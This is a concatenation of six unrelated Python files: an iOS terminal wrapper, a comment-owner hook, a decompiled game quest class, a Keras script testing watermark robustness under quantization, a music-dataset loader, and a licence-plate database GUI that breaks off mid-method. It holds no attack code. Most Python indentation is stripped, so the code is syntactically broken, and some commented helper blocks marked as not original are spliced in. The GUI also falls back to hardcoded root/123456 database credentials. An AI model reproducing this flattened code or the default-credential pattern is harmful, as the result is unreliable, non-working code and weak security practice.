# coding: utf-8
"""
The physical terminal is what the user sees.
"""
import ast
import logging
try:
import ui
from objc_util import *
except ImportError:
from . import dummyui as ui
from .dummyobjc_util import *
from .shcommon import CTRL_KEY_FLAG
try:
unicode
except NameError:
unicode = str
# ObjC related stuff
UIFont = ObjCClass("UIFont")
class ShTVDelegate(object):
def __init__(self, stash, terminal, mini_buffer, main_screen):
self.stash = stash
self.terminal = terminal
self.mini_buffer = mini_buffer
self.main_screen = main_screen
def textview_did_begin_editing(self, tv):
self.terminal.is_editing = True
def textview_did_end_editing(self, tv):
self.terminal.is_editing = False
def textview_should_change(self, tv, rng, replacement):
self.mini_buffer.feed(rng, replacement)
return False # always false
def textview_did_change(self, tv):
"""
The code works around a possible UI system bug:
some key combos that delete text, e.g. alt-delete and cmd-delete from an external
keyboard, do not trigger the textview_should_change event. The following checks
ensure consistency between the in-memory buffer and the actual UI.
"""
rng = self.terminal.selected_range
main_screen_text = self.main_screen.text
terminal_text = self.terminal.text
x_modifiable = self.main_screen.x_modifiable
if rng[0] == rng[1] and main_screen_text[rng[0] :] != terminal_text[rng[0] :]:
if rng[0] >= x_modifiable:
self.mini_buffer.feed(
None,
main_screen_text[x_modifiable : rng[0]] + terminal_text[rng[0] :],
)
self.mini_buffer.set_cursor(-len(terminal_text[rng[0] :]), whence=2)
else:
s = terminal_text[rng[0] :]
# mark the buffer to be re-rendered
self.main_screen.intact_right_bound = rng[0]
# If the trailing string is shorter than the modifiable chars,
# a valid deletion happened within the modifiable chars
# and we should keep it.
if len(s) < len(self.mini_buffer.modifiable_string):
self.mini_buffer.feed(None, s)
self.mini_buffer.set_cursor(0, whence=0)
else: # nothing should be deleted
self.mini_buffer.set_cursor(0, whence=2)
def textview_did_change_selection(self, tv):
# This callback was once used to provide approximate support for history-up/down
# shortcuts from an external keyboard. It is no longer necessary, as proper
# external keyboard support is now possible with objc_util.
# If cursor is in sync already, as a result of renderer call, flag it
# to False for future checking.
if self.terminal.cursor_synced:
self.terminal.cursor_synced = False
else:
# Sync the cursor position on terminal to main screen
# Mainly used for when user touches and changes the terminal cursor position.
self.mini_buffer.sync_cursor(self.terminal.selected_range)
# noinspection PyAttributeOutsideInit,PyUnusedLocal,PyPep8Naming
class ShTerminal(object):
"""
This is a wrapper class around the actual TextView, which subclasses SUITextView.
The wrapper encapsulates the ObjC calls so that the object behaves more like a
regular ui.TextView.
"""
def __init__(self, stash, superview, width, height, debug=False):
self.debug = debug
self.logger = logging.getLogger("StaSh.Terminal")
self.stash = stash
stash.terminal = self
# whether the terminal cursor position is in sync with main screen
self.cursor_synced = False
# Create the actual TextView by subclassing SUITextView
UIKeyCommand = ObjCClass("UIKeyCommand")
def kcDispatcher_(_self, _cmd, _sender):
key_cmd = ObjCInstance(_sender)
stash.user_action_proxy.kc_pressed(
str(key_cmd.input()), key_cmd.modifierFlags()
)
def keyCommands(_self, _cmd):
key_commands = [
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"C", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"D", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"P", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"N", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"K", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"U", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"A", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"E", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"W", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"L", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"Z", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"[", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"]", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputUpArrow", 0, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputDownArrow", 0, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputLeftArrow", 0, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputRightArrow", 0, "kcDispatcher:"
),
]
commands = ns(key_commands)
return commands.ptr
def dummyAction():
pass
def controlCAction():
ui = stash.ui
stash.ui.vk_tapped(ui.k_CC)
def controlDAction():
ui = stash.ui
ui.vk_tapped(ui.k_CD)
def controlPAction():
ui = stash.ui
ui.vk_tapped(ui.k_hup)
def controlNAction():
ui = stash.ui
ui.vk_tapped(ui.k_hdn)
def controlKAction():
stash.mini_buffer.feed(stash.mini_buffer.RANGE_CURSOR_TO_END, "")
def controlUAction():
ui = stash.ui
ui.vk_tapped(ui.k_CU)
def controlAAction(): # Move cursor to beginning of the input
stash.mini_buffer.set_cursor(0)
def controlEAction(): # Move cursor to end of the input
stash.mini_buffer.set_cursor(0, whence=2)
def controlWAction(): # delete one word backwards
stash.mini_buffer.delete_word(self.selected_range)
def controlLAction(): # clear the screen and redraw the prompt
stash.stream.feed(u"\u009bc%s" % stash.runtime.get_prompt(), no_wait=True)
def controlZAction():
stash.runtime.push_to_background()
def arrowUpAction():
ui = stash.ui
ui.vk_tapped(ui.k_hup)
def arrowDownAction():
ui = stash.ui
ui.vk_tapped(ui.k_hdn)
def arrowLeftAction():
stash.mini_buffer.set_cursor(-1, whence=1)
def arrowRightAction():
stash.mini_buffer.set_cursor(1, whence=1)
self.kc_handlers = {
("C", CTRL_KEY_FLAG): controlCAction,
("D", CTRL_KEY_FLAG): controlDAction,
("P", CTRL_KEY_FLAG): controlPAction,
("N", CTRL_KEY_FLAG): controlNAction,
("K", CTRL_KEY_FLAG): controlKAction,
("U", CTRL_KEY_FLAG): controlUAction,
("A", CTRL_KEY_FLAG): controlAAction,
("E", CTRL_KEY_FLAG): controlEAction,
("W", CTRL_KEY_FLAG): controlWAction,
("L", CTRL_KEY_FLAG): controlLAction,
("Z", CTRL_KEY_FLAG): controlZAction,
("[", CTRL_KEY_FLAG): dummyAction,
("]", CTRL_KEY_FLAG): dummyAction,
("UIKeyInputUpArrow", 0): arrowUpAction,
("UIKeyInputDownArrow", 0): arrowDownAction,
("UIKeyInputLeftArrow", 0): arrowLeftAction,
("UIKeyInputRightArrow", 0): arrowRightAction,
}
_ShTerminal = create_objc_class(
"_ShTerminal", ObjCClass("SUITextView"), [keyCommands, kcDispatcher_]
)
self.is_editing = False
self.superview = superview
self._delegate_view = ui.TextView()
self._delegate_view.delegate = stash.user_action_proxy.tv_delegate
self.tv_delegate = ShTVDelegate(
stash, self, stash.mini_buffer, stash.main_screen
)
self.tvo = (
_ShTerminal.alloc().initWithFrame_(((0, 0), (width, height))).autorelease()
)
self.tvo.setAutoresizingMask_(1 << 1 | 1 << 4) # flex Width and Height
self.content_inset = (0, 0, 0, 0)
self.auto_content_inset = False
self.background_color = ast.literal_eval(
stash.config.get("display", "BACKGROUND_COLOR")
)
font_size = stash.config.getint("display", "TEXT_FONT_SIZE")
self.default_font = UIFont.fontWithName_size_("Menlo-Regular", font_size)
self.bold_font = UIFont.fontWithName_size_("Menlo-Bold", font_size)
self.italic_font = UIFont.fontWithName_size_("Menlo-Italic", font_size)
self.bold_italic_font = UIFont.fontWithName_size_("Menlo-BoldItalic", font_size)
self.text_color = ast.literal_eval(stash.config.get("display", "TEXT_COLOR"))
self.tint_color = ast.literal_eval(stash.config.get("display", "TINT_COLOR"))
self.indicator_style = stash.config.get("display", "INDICATOR_STYLE")
self.autocapitalization_type = ui.AUTOCAPITALIZE_NONE
self.autocorrection_type = 1
self.spellchecking_type = 1
# This setting helps prevent the textview from jumping back to the top
self.non_contiguous_layout = False
# Allow editing of the text attributes
# self.editing_text_attributes = True
ObjCInstance(self.superview).addSubview_(self.tvo)
self.delegate = self._delegate_view
# TextStorage
self.tso = self.tvo.textStorage()
@property
def delegate(self):
return self._delegate_view.delegate
@delegate.setter
@on_main_thread
def delegate(self, value):
self.tvo.setDelegate_(ObjCInstance(value).delegate())
@property
def background_color(self):
return self._background_color
@background_color.setter
@on_main_thread
def background_color(self, value):
self._background_color = value
r, g, b, a = ui.parse_color(value)
self.tvo.setBackgroundColor_(UIColor.colorWithRed_green_blue_alpha_(r, g, b, 1))
@property
def text_font(self):
return self._text_font
@text_font.setter
@on_main_thread
def text_font(self, value):
name, size = self._text_font = value
self.tvo.setFont_(UIFont.fontWithName_size_(name, size))
@property
def indicator_style(self):
return self.tvo.indicatorStyle()
@indicator_style.setter
@on_main_thread
def indicator_style(self, value):
choices = {
"default": 0,
"black": 1,
"white": 2,
}
self.tvo.setIndicatorStyle_(choices[value])
@property
def text_color(self):
return self._text_color
@text_color.setter
@on_main_thread
def text_color(self, value):
self._text_color = value
r, g, b, a = ui.parse_color(value)
self.tvo.setTextColor_(UIColor.colorWithRed_green_blue_alpha_(r, g, b, 1))
@property
def tint_color(self):
return self._tint_color
@tint_color.setter
@on_main_thread
def tint_color(self, value):
self._tint_color = value
r, g, b, a = ui.parse_color(value)
self.tvo.setTintColor_(UIColor.colorWithRed_green_blue_alpha_(r, g, b, 1))
@property
def text(self):
return unicode(self.tvo.text())
@text.setter
@on_main_thread
def text(self, value):
self.tvo.setText_(value)
@property
def text_length(self):
return self.tvo.text().length()
@property
def attributed_text(self):
return self.tvo.attributedText()
@attributed_text.setter
@on_main_thread
def attributed_text(self, value):
self.tvo.setAttributedText_(value)
@property
def selected_range(self):
nsrange = self.tvo.selectedRange()
return nsrange.location, nsrange.location + nsrange.length
@selected_range.setter
@on_main_thread
def selected_range(self, rng):
"""
Set the cursor selection range. Note that the current range is checked first and
only changed if the new range is different. This avoids setting the cursor_synced
flag unnecessarily: without the check, repositioning the cursor to the same range
would turn on the cursor_synced flag but would NOT trigger the
did_change_selection event (which is what clears the flag again).
"""
if self.selected_range != rng:
self.cursor_synced = True
self.tvo.setSelectedRange_((rng[0], rng[1] - rng[0]))
@property
def autocapitalization_type(self):
return self._autocapitalization_type
@autocapitalization_type.setter
@on_main_thread
def autocapitalization_type(self, value):
self._autocapitalization_type = value
self.tvo.performSelector_withObject_("setAutocapitalizationType:", value)
@property
def autocorrection_type(self):
return self._autocorrection_type
@autocorrection_type.setter
@on_main_thread
def autocorrection_type(self, value):
self._autocorrection_type = value
ObjCInstanceMethod(self.tvo, "setAutocorrectionType:")(value)
@property
def spellchecking_type(self):
return self._spellchecking_type
@spellchecking_type.setter
@on_main_thread
def spellchecking_type(self, value):
self._spellchecking_type = value
self.tvo.performSelector_withObject_("setSpellCheckingType:", value)
@property
def content_inset(self):
return self._content_inset
@content_inset.setter
@on_main_thread
def content_inset(self, value):
self._content_inset = value
insetStructure = self.tvo.contentInset()
(
insetStructure.top,
insetStructure.left,
insetStructure.bottom,
insetStructure.right,
) = value
@property
def auto_content_inset(self):
return self._auto_content_inset
@auto_content_inset.setter
@on_main_thread
def auto_content_inset(self, value):
self._auto_content_inset = value
self.tvo.setAutomaticallyAdjustsContentInsetForKeyboard_(value)
@property
def non_contiguous_layout(self):
return self._non_contiguous_layout
@non_contiguous_layout.setter
@on_main_thread
def non_contiguous_layout(self, value):
self._non_contiguous_layout = value
self.tvo.layoutManager().setAllowsNonContiguousLayout_(value)
@property
def editing_text_attributes(self):
return self._editing_text_attributes
@editing_text_attributes.setter
@on_main_thread
def editing_text_attributes(self, value):
self._editing_text_attributes = value
self.tvo.setAllowsEditingTextAttributes_(value)
@on_main_thread
def scroll_range_to_visible(self, rng):
self.tvo.scrollRangeToVisible_(rng)
@property
def size(self):
size = self.tvo.size()
return size.width, size.height
@size.setter
@on_main_thread
def size(self, value):
"""
Set the width and height of the view
:param value: A tuple of (width, height)
"""
self.tvo.setSize_(value)
@property
def content_size(self):
size = self.tvo.contentSize()
return size.width, size.height
@property
def content_offset(self):
point = self.tvo.contentOffset()
return point.x, point.y
@property
def visible_rect(self):
rect = self.tvo.visibleRect()
return rect.size.width, rect.size.height, rect.origin.x, rect.origin.y
@on_main_thread
def scroll_to_end(self):
content_height = self.content_size[1]
# rect_height is the visible rect's height
# rect_y is the y location where the visible rect locates in the
# coordinate of content_size
_, rect_height, _, rect_y = self.visible_rect
# If the space below rect_y is more than the visible rect's height,
# or if the visible rect is over-scrolled, scroll to the last line.
if content_height - rect_y > rect_height or (
content_height > rect_height > content_height - rect_y
): # over-scroll
self.tvo.scrollRangeToVisible_((len(self.text), 0))
@on_main_thread
def begin_editing(self):
self.tvo.becomeFirstResponder()
@on_main_thread
def end_editing(self):
self.tvo.resignFirstResponder()
# noinspection PyCallingNonCallable
def kc_pressed(self, key, modifierFlags):
handler = self.kc_handlers.get((key, modifierFlags), None)
if handler:
handler()
class StubTerminal(ObjCClass):
def __init__(self, stash, *args, **kwargs):
self.stash = stash
stash.terminal = self
self.text = ""
super(StubTerminal, self).__init__(*args, **kwargs)
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with Comment object creation hooks"""
from ggrc import db
from ggrc.login import get_current_user_id
from ggrc.models.all_models import Comment, ObjectOwner
from ggrc.services.common import Resource
def init_hook():
"""Initialize all hooks"""
# pylint: disable=unused-variable
@Resource.model_posted_after_commit.connect_via(Comment)
def handle_comment_post(sender, obj=None, src=None, service=None):
"""Save information on which user created the Comment object
Args:
sender: the class of the object that initiated the server request
obj: the instance of `sender` that initiated the server request
src: a dictionary containing the POST data sent with request
service: the server-side API service that handled the request
Returns:
None
"""
# pylint: disable=unused-argument
creator_id = get_current_user_id()
obj_owner = ObjectOwner(
person_id=creator_id,
ownable_id=obj.id,
ownable_type=obj.type,
)
db.session.add(obj_owner)
|
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.quest.CogObjective
from direct.directnotify.DirectNotifyGlobal import directNotify
class CogObjective:
notify = directNotify.newCategory('CogObjective')
def __init__(self, amount, level=None, levelRange=None, name=None, variant=None, dept=None):
self.neededAmount = amount
self.amount = 0
self.level = level
self.levelRange = levelRange
self.name = name
self.dept = dept
self.variant = variant
def handleCogDeath(self, cog):
if not self.location or self.isOnLocation(cog.zoneId):
if self.level and cog.getLevel() != self.level:
return
if self.levelRange and not self.isInLevelRange(cog.getLevel()):
return
if self.name and cog.getName() != self.name:
return
if self.dept and cog.getDept() != self.dept:
return
if self.variant and cog.getVariant() != self.variant:
return
self.amount += 1
self.updateQuest()
def finished(self):
return self.amount == self.neededAmount
def isInLevelRange(self, level):
if self.levelRange:
return self.levelRange[0] <= level <= self.levelRange[1]
return False
|
##### This code works on Keras version 2.2.4 with Tensorflow nightly version 1.14.1-dev20190402
import keras
from keras.optimizers import Adam,SGD
from keras import backend as K
from keras.models import Model, load_model
from keras.datasets import cifar10
import numpy as np
import random
import sys
import os, psutil
pid = os.getpid()
py = psutil.Process(pid)
def Quantize_model(model_file, quantization_bits = 8):
model = load_model(model_file,compile=False)
model.compile(loss='categorical_crossentropy',
optimizer=SGD(),
metrics=['accuracy'])
###################### Weight quantization ################
layers_quantization_info = {}
for layer in model.layers:
if layer.count_params() != 0:
layer_parameters = layer.get_weights()
# Uniform quantization: the step size maps the largest parameter of the layer
# onto the largest representable signed integer, 2**(quantization_bits-1) - 1.
max_param = max([np.max(X) for X in layer_parameters])
step_size = max_param / (2**(quantization_bits-1)-1)
# Store the signed integer codes and write back the de-quantized (rounded) weights.
layer_parameters_signed_integer = [np.round(X/step_size) for X in layer_parameters]
layer.set_weights([np.round(X/step_size)* step_size for X in layer_parameters])
layers_quantization_info[layer.name] = (layer_parameters_signed_integer, step_size)
return model, layers_quantization_info
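# Illustrative sketch (not part of the original script): a worked example of the
# uniform quantization arithmetic used in Quantize_model, on a made-up weight array.
# With 8-bit quantization the step size is max_param / (2**7 - 1) = max_param / 127,
# and every weight is rounded to the nearest multiple of that step.
def _quantization_example(quantization_bits=8):
    weights = np.array([0.5, -0.24, 0.127, 0.0])                     # toy weights (assumed values)
    step_size = np.max(weights) / (2**(quantization_bits - 1) - 1)   # 0.5 / 127 ~= 0.003937
    signed_integers = np.round(weights / step_size)                  # [127., -61., 32., 0.]
    dequantized = signed_integers * step_size                        # weights snapped back onto the grid
    return signed_integers, dequantized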
def equal_split(X,Y,train_set_sample_per_label,number_of_labels):
x_train_split = []
y_train_split = []
x_test_split = []
y_test_split = []
for label in range(number_of_labels):
max_sample_size = len(list(np.where(np.argmax(Y,axis=1)[:]==label)[0]))
train_idx = random.sample(list(np.where(np.argmax(Y,axis=1)[:]==label)[0]),min(train_set_sample_per_label,max_sample_size))
test_idx = list(set(np.where(np.argmax(Y,axis=1)[:]==label)[0]).difference(set(train_idx)))
train_images = X[train_idx,::]
train_labels = Y[train_idx,::]
test_images = X[test_idx,::]
test_labels = Y[test_idx,::]
if label == 0 :
x_train_split = train_images
y_train_split = train_labels
x_test_split = test_images
y_test_split = test_labels
else:
x_train_split = np.vstack((x_train_split,train_images))
y_train_split = np.vstack((y_train_split,train_labels))
x_test_split = np.vstack((x_test_split,test_images))
y_test_split = np.vstack((y_test_split,test_labels))
return x_train_split, x_test_split, y_train_split, y_test_split
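# Illustrative sketch (not part of the original script): equal_split applied to a toy
# one-hot labelled set, drawing one training sample per label and keeping the rest as
# test data. All values below are made up.
def _equal_split_example():
    X = np.arange(12).reshape(6, 2)            # six toy samples with two features each
    Y = np.eye(3)[[0, 0, 1, 1, 2, 2]]          # one-hot labels for three classes
    x_tr, x_te, y_tr, y_te = equal_split(X, Y, train_set_sample_per_label=1, number_of_labels=3)
    return x_tr.shape, x_te.shape              # (3, 2) and (3, 2)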
def performance_check(model, grad_select, watermark, key_embed, watermarked_training_images, watermarked_training_images_label,num_pixels):
###############################################################################
y_true = K.placeholder(shape=model.output.shape)
cross_ent = K.categorical_crossentropy(y_true,model.output)
get_grads = K.function([model.input,y_true],K.gradients(cross_ent,model.input))
################################################################################
trial_results = []
for _ in range(5):
idx = random.sample(range(watermarked_training_images.shape[0]),50)
grad_x = watermarked_training_images[idx,::]
grad_y = watermarked_training_images_label[idx,::]
gradients = K.variable(get_grads([grad_x,grad_y])[0])
mean_gradients = K.mean(gradients,axis=0)
flattened_mean_grads = K.flatten(mean_gradients)
selected_mean_grads = K.reshape(K.switch(1.0-grad_select,K.zeros_like(flattened_mean_grads),flattened_mean_grads),shape=(num_pixels,1))
projection = K.cast(K.reshape(0 <= (K.dot(key_embed,selected_mean_grads)),watermark.shape),K.floatx())
wm_tr_acc = 1.00 - K.mean(K.abs(projection-watermark))
trial_results.append(K.get_value(wm_tr_acc))
############################################################################################################
mean_wm_acc = sum(trial_results)/len(trial_results)
return mean_wm_acc
########################################################################
########################################################################
########################################################################
num_available_samples_per_label = 2048
target_class_label = 0.
num_classes = 10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
num_pixels = x_train.shape[1]*x_train.shape[2]*x_train.shape[3]
input_shape = x_train.shape[1:]
##################### Creating the watermark training images #########
idx = np.where(y_train[:]==target_class_label)[0]
watermarked_training_images = x_train[idx,::]
watermarked_training_images_label = y_train[idx,::]
###################### Creating the watermark testing images ###########
idx = np.where(y_test[:]==target_class_label)[0]
watermarked_testing_images = x_test[idx,::]
watermarked_testing_images_label = y_test[idx,::]
#######################################################################
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
watermarked_testing_images = watermarked_testing_images.astype('float32') / 255
watermarked_training_images = watermarked_training_images.astype('float32') / 255
# subtracting pixel mean
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
watermarked_training_images -= x_train_mean
watermarked_testing_images -= x_train_mean
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
watermarked_training_images_label = keras.utils.to_categorical(watermarked_training_images_label,num_classes)
watermarked_testing_images_label = keras.utils.to_categorical(watermarked_testing_images_label,num_classes)
###################################################
model_type = '64-bit-CIFAR10'
model = load_model(model_type+'.hdf5',compile=False)
opt = Adam(lr=0.0001, decay=1e-6)
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
watermark = K.variable(np.load('wm.npy'))
key_embed = K.variable(np.load('embed_key_extended.npy'))
grad_select = K.variable(np.load("grad_select.npy"))
wm_acc = performance_check(model = model, grad_select = grad_select, watermark = watermark,key_embed = key_embed,
watermarked_training_images = watermarked_training_images,watermarked_training_images_label = watermarked_training_images_label
,num_pixels = num_pixels)
base_line = model.evaluate(x_test,y_test,verbose=0)[1]
print("Model's original accuracy: ", base_line)
for q_bits in [8,16]:
print("----------------------------- ", q_bits, " -bits quantization ---------------------------------")
q_model,layers_quantization_info = Quantize_model(model_file=model_type+'.hdf5',quantization_bits=q_bits)
wm_acc = performance_check(model = q_model, grad_select = grad_select, watermark = watermark,key_embed = key_embed,
watermarked_training_images = watermarked_training_images,watermarked_training_images_label = watermarked_training_images_label
,num_pixels = num_pixels)
test_acc = q_model.evaluate(x_test,y_test,verbose=0)[1]
print("Watermark accuracy after quantization: ", wm_acc, " Model's accuracy after quantization: ", test_acc)
|
"""Medley-solos-DB Dataset Loader.
.. admonition:: Dataset Info
:class: dropdown
Medley-solos-DB is a cross-collection dataset for automatic musical instrument
recognition in solo recordings. It consists of a training set of 3-second audio
clips, which are extracted from the MedleyDB dataset (Bittner et al., ISMIR 2014)
as well as a test set of 3-second clips, which are extracted from the solosDB
dataset (Essid et al., IEEE TASLP 2009).
Each of these clips contains a single instrument among a taxonomy of eight:
0. clarinet,
1. distorted electric guitar,
2. female singer,
3. flute,
4. piano,
5. tenor saxophone,
6. trumpet, and
7. violin.
The Medley-solos-DB dataset is the dataset that is used in the benchmarks of
musical instrument recognition in the publications of Lostanlen and Cella
(ISMIR 2016) and Andén et al. (IEEE TSP 2019).
"""
import csv
import logging
import os
from typing import BinaryIO, Optional, TextIO, Tuple
import librosa
import numpy as np
from mirdata import download_utils
from mirdata import jams_utils
from mirdata import core
from mirdata import io
BIBTEX = """@inproceedings{lostanlen2019ismir,
title={Deep Convolutional Networks in the Pitch Spiral for Musical Instrument Recognition},
author={Lostanlen, Vincent and Cella, Carmine Emanuele},
booktitle={International Society of Music Information Retrieval (ISMIR)},
year={2016}
}"""
REMOTES = {
"annotations": download_utils.RemoteFileMetadata(
filename="Medley-solos-DB_metadata.csv",
url="https://zenodo.org/record/3464194/files/Medley-solos-DB_metadata.csv?download=1",
checksum="fda6a589c56785f2195c9227809c521a",
destination_dir="annotation",
),
"audio": download_utils.RemoteFileMetadata(
filename="Medley-solos-DB.tar.gz",
url="https://zenodo.org/record/3464194/files/Medley-solos-DB.tar.gz?download=1",
checksum="f5facf398793ef5c1f80c013afdf3e5f",
destination_dir="audio",
),
}
LICENSE_INFO = "Creative Commons Attribution 4.0 International."
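# A small reference mapping (not in the original module), derived from the taxonomy
# listed in the module docstring above; it assumes the instrument_id stored in the
# metadata follows that same 0-7 numbering.
INSTRUMENT_ID_TO_NAME = {
    0: "clarinet",
    1: "distorted electric guitar",
    2: "female singer",
    3: "flute",
    4: "piano",
    5: "tenor saxophone",
    6: "trumpet",
    7: "violin",
}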
class Track(core.Track):
"""medley_solos_db Track class
Args:
track_id (str): track id of the track
Attributes:
audio_path (str): path to the track's audio file
instrument (str): instrument encoded by its English name
instrument_id (int): instrument encoded as an integer
song_id (int): song encoded as an integer
subset (str): either equal to 'train', 'validation', or 'test'
track_id (str): track id
"""
def __init__(
self,
track_id,
data_home,
dataset_name,
index,
metadata,
):
super().__init__(
track_id,
data_home,
dataset_name,
index,
metadata,
)
self.audio_path = os.path.join(self._data_home, self._track_paths["audio"][0])
@property
def instrument(self):
return self._track_metadata.get("instrument")
@property
def instrument_id(self):
return self._track_metadata.get("instrument_id")
@property
def song_id(self):
return self._track_metadata.get("song_id")
@property
def subset(self):
return self._track_metadata.get("subset")
@property
def audio(self) -> Optional[Tuple[np.ndarray, float]]:
"""The track's audio
Returns:
* np.ndarray - audio signal
* float - sample rate
"""
return load_audio(self.audio_path)
def to_jams(self):
"""Get the track's data in jams format
Returns:
jams.JAMS: the track's data in jams format
"""
return jams_utils.jams_converter(
audio_path=self.audio_path, metadata=self._track_metadata
)
@io.coerce_to_bytes_io
def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:
"""Load a Medley Solos DB audio file.
Args:
fhandle (str or file-like): File-like object or path to audio file
Returns:
* np.ndarray - the mono audio signal
* float - The sample rate of the audio file
"""
return librosa.load(fhandle, sr=22050, mono=True)
@core.docstring_inherit(core.Dataset)
class Dataset(core.Dataset):
"""
The medley_solos_db dataset
"""
def __init__(self, data_home=None):
super().__init__(
data_home,
name="medley_solos_db",
track_class=Track,
bibtex=BIBTEX,
remotes=REMOTES,
license_info=LICENSE_INFO,
)
@core.cached_property
def _metadata(self):
metadata_path = os.path.join(
self.data_home, "annotation", "Medley-solos-DB_metadata.csv"
)
if not os.path.exists(metadata_path):
raise FileNotFoundError("Metadata not found. Did you run .download()?")
metadata_index = {}
with open(metadata_path, "r") as fhandle:
csv_reader = csv.reader(fhandle, delimiter=",")
next(csv_reader)
for row in csv_reader:
subset, instrument_str, instrument_id, song_id, track_id = row
metadata_index[str(track_id)] = {
"subset": str(subset),
"instrument": str(instrument_str),
"instrument_id": int(instrument_id),
"song_id": int(song_id),
}
return metadata_index
@core.copy_docs(load_audio)
def load_audio(self, *args, **kwargs):
return load_audio(*args, **kwargs)
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = 'muwfm'
import tkinter as tk
from tkinter import ttk
from tkinter.filedialog import *
import tkinter.messagebox
import pymysql
class Search(ttk.Frame):
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame00 = ttk.Frame(self)
frame0 = ttk.Frame(self)
frame1 = ttk.Frame(self)
frame2 = ttk.Frame(self)
frame3 = ttk.Frame(self)
frame4 = ttk.Frame(self)
frame5 = ttk.Frame(self)
frame6 = ttk.Frame(self)
win.title("车牌数据库查询")
# win.minsize(920, 600)
self.s1 = StringVar()
self.s2 = StringVar()
self.s3 = StringVar()
self.s4 = StringVar()
self.s5 = StringVar()
self.s6 = StringVar()
frame00.pack(side=TOP, fill=tk.Y, expand=1)
frame0.pack(side=TOP, fill=tk.Y, expand=1)
frame1.pack(side=TOP, fill=tk.Y, expand=1)
frame2.pack(side=TOP, fill=tk.Y, expand=1)
frame3.pack(side=TOP, fill=tk.Y, expand=1)
frame4.pack(side=TOP, fill=tk.Y, expand=1)
frame6.pack(side=TOP, fill=tk.Y, expand=1)
frame5.pack(side=TOP, fill=tk.Y, expand=1)
self.t = Text(frame00, width=100)
self.t.pack()
self.t.insert('1.0', "此处显示查询结果\n")
self.label0 = ttk.Label(frame0, text='数据库地址:', width=10)
self.label0.pack(side=LEFT)
self.input0 = ttk.Entry(frame0, textvariable=self.s1, width=30)
self.input0.pack(side=RIGHT)
self.label = ttk.Label(frame1, text='用户名:', width=10)
self.label.pack(side=LEFT)
self.input1 = ttk.Entry(frame1, textvariable=self.s2, width=30)
self.input1.pack(side=RIGHT)
self.label2 = ttk.Label(frame2, text='密码: ', width=10)
self.label2.pack(side=LEFT)
self.input2 = ttk.Entry(frame2, textvariable=self.s3, width=30)
self.input2.pack(side=RIGHT)
self.label3 = ttk.Label(frame3, text='数据库名称: ', width=10)
self.label3.pack(side=LEFT)
self.input3 = ttk.Entry(frame3, textvariable=self.s4, width=30)
self.input3.pack(side=RIGHT)
self.label4 = ttk.Label(frame4, text='数据表名称: ', width=10)
self.label4.pack(side=LEFT)
self.input4 = ttk.Entry(frame4, textvariable=self.s5, width=30)
self.input4.pack(side=RIGHT)
self.input5 = ttk.Entry(frame6, textvariable=self.s6, width=30)
self.input5.pack(side=LEFT)
self.label5 = ttk.Button(frame6, text='关键字查询', width=10, command=self.sql2)
self.label5.pack(side=RIGHT)
self.clean_button = ttk.Button(frame5, text="清除输入信息", width=15, command=self.clean)
self.clean_button.pack(side=LEFT)
self.url_face_button = ttk.Button(frame5, text="开始查询", width=15, command=self.sql)
self.url_face_button.pack(side=LEFT)
self.pack(fill=tk.BOTH, expand=tk.YES, padx="10", pady="10")
self.center_window()
def sql(self):
self.t.delete(1.0, END)
NAME1 = self.input0.get() or "localhost"
USRE1 = self.input1.get() or "root"
PASS1 = self.input2.get() or "123456"
SQLNAME1 = self.input3.get() or "chepai1"
TABLENAME1 = self.input4.get() or "carinfo"
self.select_sql(NAME1, USRE1, PASS1, SQLNAME1, TABLENAME1)
def sql2(self):
self.t.delete(1.0, END)
NAME1 = self.input0.get() or "localhost"
USRE1 = self.input1.get() or "root"
PASS1 = self.input2.get() or "123456"
SQLNAME1 = self.input3.get() or "chepai1"
TABLENAME1 = self.input4.get() or "carinfo"
CARPLA1 = self.input5.get()
if (CARPLA1==""):
tkinter.messagebox.showinfo(title='车牌数据库系统', message='关键字不能为空')
return
